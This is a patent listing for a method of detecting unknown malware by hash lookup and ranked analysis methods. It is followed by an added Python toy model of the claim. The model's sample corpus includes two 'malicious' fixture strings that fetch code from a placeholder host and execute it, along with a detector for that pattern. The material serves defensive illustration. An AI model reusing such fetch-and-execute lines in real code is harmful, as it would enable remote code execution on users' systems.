System and Method for Detecting Unknown Malware

  • US 20120174227A1
  • Filed: 07/26/2011
  • Published: 07/05/2012
  • Est. Priority Date: 12/30/2010
  • Status: Active Grant
First Claim

1. A computer-implemented method for detecting unknown malware, the method comprising:

  • generating a hash of an unknown object;
  • comparing the hash of the unknown object with hashes of known clean and malicious objects;
  • if the hash of the unknown object matches one of the hashes of either known clean or malicious objects, terminating analysis of the unknown object;
  • if the hash of the unknown object does not match any hash of the known clean or malicious objects, selecting out of a plurality of different malware analysis methods at least two most effective malware analysis methods for further analysis of the unknown object for presence of malware, wherein the effectiveness of a malware analysis method is determined as a function of a level of successful malware detections of known malicious objects and a level of false positive detections of known clean objects by said malware analysis method;
  • generating a different object gene of the unknown object for each of the two selected malware analysis methods, wherein an object gene is a data structure containing a plurality of information elements retrieved from or associated with the unknown object, and wherein an object gene for each malware analysis method is selected from unique lines of code of the unknown object gene, operational areas of the unknown object gene, execution path of the unknown object gene, behavior pattern of the unknown object gene, program flowchart of the unknown object gene, or function call graph of the unknown object gene;
  • analyzing each generated object gene of the unknown object using the selected malware analysis methods; and
  • determining if the unknown object is clean or malicious based on the results of the analysis of the generated object genes using the selected malware analysis methods.
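The claimed pipeline, rendered as a small Python model that is an added illustration and not code from the patent or its assignee: a hash lookup against known-clean and known-malicious sets ends analysis on a hit; otherwise the two methods with the best effectiveness score are chosen, each builds its own object gene (unique lines, call graph, or callee sequence as a behaviour pattern) and the verdict is combined from their results. The corpus, hashes, genes, detectors, the scoring rule (detection rate minus false-positive rate) and the combination rule (any positive means malicious) are all constructed assumptions, since the claim only fixes the structure, not these specifics.

```python
import hashlib
import re

# Constructed labelled corpus: tiny scripts (bytes) with known verdicts.
KNOWN = {
    b"name = input()\nprint('hi', name)\n": "clean",
    b"expr = input()\nprint(eval(expr))\n": "clean",  # benign use of eval
    b"total = sum(range(10))\nprint(total)\n": "clean",
    b"d = fetch('http://example.invalid/p')\nexec(decode(d))\n": "malicious",
    b"blob = fetch('http://example.invalid/q')\nexec(decode(blob))\n": "malicious",
}
KNOWN_HASHES = {hashlib.sha256(o).hexdigest(): lab for o, lab in KNOWN.items()}
# Object genes: each analysis method gets its own view of the object.
def gene_unique_lines(obj):   # unique lines of code
    return {ln.strip() for ln in obj.decode().splitlines() if ln.strip()}
def gene_behavior(obj):       # behaviour pattern: ordered sequence of callees
    return re.findall(r"\b(\w+)\(", obj.decode())
def gene_call_graph(obj):     # crude call graph: set of callee names
    return set(gene_behavior(obj))
def fetch_then_exec(seq):     # toy detector: download followed by execution
    return "fetch" in seq and "exec" in seq[seq.index("fetch"):]
# Analysis methods as (gene builder, detector) pairs; all detectors are toys.
METHODS = {
    "line_signature": (gene_unique_lines, lambda g: "exec(decode(blob))" in g),
    "call_graph": (gene_call_graph, lambda g: bool(g & {"exec", "eval"})),
    "behavior": (gene_behavior, fetch_then_exec),
    "print_heuristic": (gene_call_graph, lambda g: "print" in g),  # noisy
}
def effectiveness(name):
    # Assumed scoring: detection rate on known-malicious minus false-positive
    # rate on known-clean. The claim only says 'a function of' the two levels.
    gene, detect = METHODS[name]
    mal = [o for o, lab in KNOWN.items() if lab == "malicious"]
    clean = [o for o, lab in KNOWN.items() if lab == "clean"]
    tpr = sum(detect(gene(o)) for o in mal) / len(mal)
    fpr = sum(detect(gene(o)) for o in clean) / len(clean)
    return tpr - fpr

def select_methods(k=2):      # the k most effective methods (claim: at least two)
    return sorted(METHODS, key=effectiveness, reverse=True)[:k]

def analyze(obj):
    """Hash hit ends analysis; otherwise any positive selected method means malicious."""
    label = KNOWN_HASHES.get(hashlib.sha256(obj).hexdigest())
    if label is not None:
        return label, "hash"
    chosen = select_methods()
    flagged = [n for n in chosen if METHODS[n][1](METHODS[n][0](obj))]
    return ("malicious" if flagged else "clean"), chosen
```

Note that the method with benign-`eval` false positives ranks below the behaviour-pattern method and the print heuristic is never selected, which is the effect the effectiveness ranking in the claim is meant to have.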
